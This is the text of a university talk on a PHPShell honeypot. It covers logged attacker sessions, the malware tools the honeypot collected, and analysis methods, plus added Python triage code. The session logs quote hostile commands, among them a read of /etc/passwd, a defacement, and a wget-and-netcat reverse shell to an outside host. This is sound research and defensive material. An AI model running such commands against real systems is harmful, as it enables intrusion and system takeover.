
Tales from the Honeypot - Clarkson University (owensjp/pubs/ITL_Honeypot.pdf)



Tales from the Honeypot

Jim Owens


Overview

Definitions
Setup & deployment
Activity: levels & types
Tools
  Sources
  Types
  Samples
  Analysis
    Static analysis
    Dynamic analysis
Conclusions


Definitions

Honeypot
  Real or virtual computer system
  Appears vulnerable to attack
  Exists to be exploited (and studied)

Low-interaction honeypot
  Emulates a vulnerable system
  Designed to fool attackers for a short time
  Primary goal is to collect malware tools for analysis


Setup

PHPShell 1.7
  “A shell wrapped in a PHP script…”
  v1.7 has well-known security issues

PHPHOP version
  Requires Apache and PHP support
  Provides a thin layer of functionality
  Logs activity to text files
  Downloads malware tools in background (or not)


Setup


Setup: PHPHOP logging

Logged fields:
  IP address
  hostname
  query string
  pwd (present working directory)
  command
  user agent
  referer

PHPHOP downloads
  wget or curl or lynx
  Downloaded files not accessible to attacker


Deployment

May require script modifications

Transparent links
  Create on popular pages
  Drive search traffic to honeypot

Traffic (MySQL) database & browsing tool
  Supports sophisticated queries
  Simplifies browsing of honeypot traffic


Activity: Oct '06 – Oct '07

[Chart: Total Hits by Distinct IP. X-axis: Date, ticks from 10/5/2006 to 10/9/2007; Y-axis: Distinct IPs, 0 to 24.]


Sample activity types

Curious
Destructive
Angry
Friendly
Efficient
Guilty
Stupid


Curious
Source IP: 88.73.7.239
Date: 4/1/2007, 3pm
(http://www.google.de/search?q=<"Enable stderr" filetypephp inurl"work_dir")

ls
cat /etc/passwd
uname -a


Destructive
Source IP: 201.132.96.174
Date: 4/12/2007, 4pm
(http://www.diosdelared.com/foro/index.php?topic=224.15)

echo HACKED BY LaLo PaRa Ti YaReLi>index.php


Angry
Source IP: 202.173.224.82
Date: 2/15/2007, 7am

ls
ssh
su
/sbin/ifconfig
/sbin/ifconfig
/sbin/ifconfig
...
(600+ line script probing for vulnerable Web apps & files)
...
(22 more GETs for various documents actually on server)


Friendly
Source IP: 62.129.172.74
Date: 2/27/2007, 8am
(http://www.google.fr/search?q=PHP Shell 1.7)

id && echo "hi honeypot"
ls -al;pwd
netstat -nap --ip
ls /bin
!!! :)
cat ~/.bash_history


Efficient
Source IP: 136.159.73.4 (ucalgary.ca)
Date: 3/9/2007, 1pm

mkdir /var/tmp/...;wget -O /var/tmp/.../nc http://greatsploit.greatnow.com/nc;chmod 755 /var/tmp/.../nc;/var/tmp/.../nc -e /bin/sh 136.159.73.4 10883


Guilty
Source IP: 161.139.212.82 (Universiti Teknologi Malaysia)
Date: 8/22/2007, 4am
(http://www.google.com.my/search?q=allinurlphpshell.php)

echo betik was here.. betik is innocent.. selamat bekerja>betik.txt


Stupid
Source IP: 68.250.150.179
Date: 9/12/2007, 1pm
(http://www.google.com/search?q=intitle:"PHP Shell *" &filetype:php)

shell_exec('sudo -u root -S command_goes_here < /home/$User/dir/dir/dir/passfile');

shell_exec("C:\\path\\to\\cmd.exe /c C:\\batchfile.cmd");
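An added example, not part of the talk or of PHPHOP: a Python triage pass over log lines carrying the fields the PHPHOP logging slide lists, bucketing each command into the activity types illustrated above (only the types the slides show a command for). The tab-separated layout, the sample lines and the documentation-range IP addresses are assumptions made for the example.

```python
import re
from collections import Counter

# Assumed log layout (not shown on the slides): one tab-separated line per
# request, fields in the order the logging slide lists them. Sample lines are
# constructed; addresses are RFC 5737 documentation ranges, not IPs from the talk.
FIELDS = ("ip", "hostname", "query", "pwd", "command", "user_agent", "referer")
SAMPLE_LOG = (
    "192.0.2.10\t-\tcommand=ls\t/var/www\tls\tMozilla/5.0\t"
    "http://www.google.de/search?q=PHP+Shell+1.7\n"
    "192.0.2.10\t-\tcommand=cat\t/var/www\tcat /etc/passwd\tMozilla/5.0\t"
    "http://www.google.de/search?q=PHP+Shell+1.7\n"
    "198.51.100.7\t-\tcommand=echo\t/var/www\techo HACKED>index.php\tMozilla/4.0\t-\n"
    "203.0.113.5\t-\tcommand=mkdir\t/var/www\t"
    "mkdir /var/tmp/...;wget -O /var/tmp/.../nc http://host.example/nc\tcurl/7.15\t-\n"
)

# Command patterns for the activity types the slides illustrate with commands.
# Order matters: a tool download counts as "efficient" even if it also lists files.
RULES = (
    ("efficient", re.compile(r"\b(wget|curl|lynx)\b")),       # fetches a tool
    ("destructive", re.compile(r">\s*\S+\.(php|html?)\b")),   # overwrites a page
    ("curious", re.compile(r"^(ls|id|pwd|uname|cat /etc/passwd|netstat)\b")),
)

def parse_line(line):
    """Split one log line into a dict keyed by FIELDS; None if field count is wrong."""
    parts = line.rstrip("\n").split("\t")
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def classify(command):
    """Return the first matching activity type from RULES, else 'other'."""
    return next((label for label, pat in RULES if pat.search(command)), "other")

def triage(log_text):
    """Per source IP: a Counter of activity types and the set of referers seen."""
    report = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue                      # skip malformed lines instead of crashing
        rec = report.setdefault(entry["ip"], {"types": Counter(), "referers": set()})
        rec["types"][classify(entry["command"])] += 1
        if entry["referer"] != "-":
            rec["referers"].add(entry["referer"])
    return report
```

The referer set per IP is what links a visit back to the search query that found the honeypot, which is how the slides above know which Google search each visitor came from.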


Tools

Sources
Types


Tools: Sources

Free hosting sites
ISP sites
“Hacker”/personal sites
Malware repositories
  Packet storm
  Milw0rm
Regular old (hacked) Web sites


Tools: Types

IRC bot clients
Phishing sites (Paypal, Bank of America)
Shells (r57, c99, many variants)
DDOS tools
Backdoors
Root exploits
Bouncers (psyBNC)
Internet game server (Nexuiz)
You name it!


Tools: Samples

Backdoor programs: bd.py, m0rtix.c
Local root exploit: prctl.sh
Web site defacement: pink-bebek.jpg


Tools: Analysis

Static analysis
  Techniques that don’t require actually running the tool
  Review source, if available
  Identify file type, for binaries
  Viewing internal strings; Web search may yield source

Dynamic analysis
  Techniques used while the tool is running
  Best done in an instrumented “sandbox” environment
  Track network connections attempted
  Trace system calls and files accessed or created
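As an added example (not from the talk), a small Python static-triage routine in the spirit of the static analysis steps above: guess the file type from leading magic bytes as file(1) would, pull printable strings as strings(1) would, and list any URLs or IPv4 addresses found in them so they can be searched for or blocked. The MAGIC table and the SAMPLE bytes are constructed for the example.

```python
import re

# Leading magic bytes for the kinds of samples the talk lists (scripts, native
# binaries, defacement images). A constructed table, not an exhaustive one.
MAGIC = (
    (b"\x7fELF", "ELF binary"),
    (b"#!", "script (shebang)"),
    (b"<?php", "PHP source"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"\x89PNG", "PNG image"),
)
PRINTABLE = set(range(0x20, 0x7f))                     # printable ASCII incl. space
URL_RE = re.compile(r"https?://[\w.\-/:%?=&+]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def file_type(data):
    """Guess the type from leading magic bytes, as file(1) would; else 'unknown'."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    return "unknown"

def strings(data, min_len=4):
    """Runs of at least min_len printable bytes, like the strings(1) tool."""
    found, run = [], bytearray()
    for b in data + b"\x00":                           # sentinel flushes the last run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found

def triage(data):
    """Static summary: type, string count, and embedded URLs / IPv4 addresses."""
    found = strings(data)
    text = "\n".join(found)
    return {
        "type": file_type(data),
        "strings": len(found),
        "urls": sorted(set(URL_RE.findall(text))),
        "ips": sorted(set(IPV4_RE.findall(text))),
    }

# Constructed sample: a fake ELF header followed by strings a backdoor might carry.
SAMPLE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9
          + b"/bin/sh\x00connect back to 198.51.100.7\x00"
          + b"http://host.example/tools/nc\x00\x01\x02ab\x00")
```

Running triage(SAMPLE) reports an ELF binary with three strings, one URL and one IPv4 address; the dynamic steps on the slide (network and system-call tracing) need a sandbox and are not covered here.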


Conclusions

Low-interaction honeypots:
  Require little effort to set up/maintain
  Prove effective in drawing traffic, even a year after deployment
  Provide valuable insights into attackers’ methods and motivations, as well as moments of levity
  Collect malware tools for later analysis